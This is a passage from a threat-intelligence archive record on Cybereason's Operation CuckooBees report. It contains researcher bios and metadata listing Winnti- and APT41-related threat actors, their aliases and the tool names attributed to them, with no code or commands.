Akihiro was also formerly the team lead of the Advanced Security Services team at Cybereason, responsible for managing, developing and delivering a variety of professional services, including proactive threat hunting, security posture assessment, advanced security training and consulting services.\r\nNiv Yona\r\nNiv, IR Practice Director, leads Cybereason's incident response practice in the EMEA region. Niv began his career a decade ago in the Israeli Air Force as a team leader in the security operations center, where he specialized in incident response, forensics, and malware analysis. In former roles at Cybereason, he focused on threat research that directly enhances product detections and the Cybereason threat hunting playbook, as well as the development of new strategic services and offerings.\r\nDaniel Frank\r\nWith a decade in malware research, Daniel uses his expertise in malware analysis and reverse engineering to understand APT activity and commodity cybercrime attackers. Daniel has previously shared research at RSA Conference, the Microsoft Digital Crimes Consortium, and Rootcon.\r\nAssaf Dahan, Head of Threat Research\r\nAssaf has over 15 years in the InfoSec industry. He started his career in the military’s cybersecurity unit, where he developed extensive experience in offensive security. Later in his career he led Red Teams, developed penetration testing methodologies, and specialized in malware analysis and reverse engineering.\r\nAbout the Author\r\nCybereason Nocturnus\r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and enterprise security to uncover emerging threats across the globe.
They specialize in analyzing new attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.\r\nSource: https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques"
	],
	"report_names": [
		"operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques"
	],
	"threat_actors": [
		{
			"id": "5bbced13-72f7-40dc-8c41-dcce75bf885e",
			"created_at": "2022-10-25T15:50:23.695735Z",
			"updated_at": "2026-04-10T02:00:05.335976Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"Winnti Group"
			],
			"source_name": "MITRE:Winnti Group",
			"tools": [
				"PipeMon",
				"Winnti for Windows",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "49822165-5541-423d-8808-1c0a9448d588",
			"created_at": "2022-10-25T16:07:23.384093Z",
			"updated_at": "2026-04-10T02:00:04.575678Z",
			"deleted_at": null,
			"main_name": "Barium",
			"aliases": [
				"Brass Typhoon",
				"Pigfish",
				"Starchy Taurus"
			],
			"source_name": "ETDA:Barium",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Barlaiy",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Destroy RAT",
				"DestroyRAT",
				"Kaba",
				"Korplug",
				"POISONPLUG",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c7d9878a-e691-4c6f-81ae-84fb115a1345",
			"created_at": "2022-10-25T16:07:23.359506Z",
			"updated_at": "2026-04-10T02:00:04.556639Z",
			"deleted_at": null,
			"main_name": "APT 41",
			"aliases": [
				"BrazenBamboo",
				"Bronze Atlas",
				"Double Dragon",
				"Earth Baku",
				"G0096",
				"Grayfly",
				"Operation ColunmTK",
				"Operation CuckooBees",
				"Operation ShadowHammer",
				"Red Kelpie",
				"SparklingGoblin",
				"TA415",
				"TG-2633"
			],
			"source_name": "ETDA:APT 41",
			"tools": [
				"9002 RAT",
				"ADORE.XSEC",
				"ASPXSpy",
				"ASPXTool",
				"AceHash",
				"Agent.dhwf",
				"Agentemis",
				"AndroidControl",
				"AngryRebel",
				"AntSword",
				"BLUEBEAM",
				"Barlaiy",
				"BlackCoffee",
				"Bladabindi",
				"BleDoor",
				"CCleaner Backdoor",
				"CHINACHOPPER",
				"COLDJAVA",
				"China Chopper",
				"ChyNode",
				"Cobalt Strike",
				"CobaltStrike",
				"Crackshot",
				"CrossWalk",
				"CurveLast",
				"CurveLoad",
				"DAYJOB",
				"DBoxAgent",
				"DEADEYE",
				"DEADEYE.APPEND",
				"DEADEYE.EMBED",
				"DEPLOYLOG",
				"DIRTCLEANER",
				"DUSTTRAP",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"DodgeBox",
				"DragonEgg",
				"ELFSHELF",
				"EasyNight",
				"Farfli",
				"FunnySwitch",
				"Gh0st RAT",
				"Ghost RAT",
				"HDD Rootkit",
				"HDRoot",
				"HKDOOR",
				"HOMEUNIX",
				"HUI Loader",
				"HidraQ",
				"HighNoon",
				"HighNote",
				"Homux",
				"Hydraq",
				"Jorik",
				"Jumpall",
				"KEYPLUG",
				"Kaba",
				"Korplug",
				"LATELUNCH",
				"LOLBAS",
				"LOLBins",
				"LightSpy",
				"Living off the Land",
				"Lowkey",
				"McRAT",
				"MdmBot",
				"MessageTap",
				"Meterpreter",
				"Mimikatz",
				"MoonBounce",
				"MoonWalk",
				"Motnug",
				"Moudour",
				"Mydoor",
				"NTDSDump",
				"PACMAN",
				"PCRat",
				"PINEGROVE",
				"PNGRAT",
				"POISONPLUG",
				"POISONPLUG.SHADOW",
				"POTROAST",
				"PRIVATELOG",
				"PipeMon",
				"PlugX",
				"PortReuse",
				"ProxIP",
				"ROCKBOOT",
				"RbDoor",
				"RedDelta",
				"RedXOR",
				"RibDoor",
				"Roarur",
				"RouterGod",
				"SAGEHIRE",
				"SPARKLOG",
				"SQLULDR2",
				"STASHLOG",
				"SWEETCANDLE",
				"ScrambleCross",
				"Sensocode",
				"SerialVlogger",
				"ShadowHammer",
				"ShadowPad Winnti",
				"SinoChopper",
				"Skip-2.0",
				"SneakCross",
				"Sogu",
				"Speculoos",
				"Spyder",
				"StealthReacher",
				"StealthVector",
				"TERA",
				"TIDYELF",
				"TIGERPLUG",
				"TOMMYGUN",
				"TVT",
				"Thoper",
				"Voldemort",
				"WIDETONE",
				"WINNKIT",
				"WINTERLOVE",
				"Winnti",
				"WyrmSpy",
				"X-Door",
				"XDOOR",
				"XMRig",
				"XShellGhost",
				"Xamtrav",
				"ZXShell",
				"ZoxPNG",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"gresim",
				"njRAT",
				"pwdump",
				"xDll"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "945a572f-ebe3-4e2f-a288-512fe751cfa8",
			"created_at": "2022-10-25T16:07:24.413971Z",
			"updated_at": "2026-04-10T02:00:04.97924Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"G0044",
				"Leopard Typhoon",
				"Wicked Panda",
				"Winnti Group"
			],
			"source_name": "ETDA:Winnti Group",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"FunnySwitch",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775446641,
	"ts_updated_at": 1775826700,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2f4421953eab17da7490549a7d745b2e228c0bd0.pdf",
		"text": "https://archive.orkl.eu/2f4421953eab17da7490549a7d745b2e228c0bd0.txt",
		"img": "https://archive.orkl.eu/2f4421953eab17da7490549a7d745b2e228c0bd0.jpg"
	}
}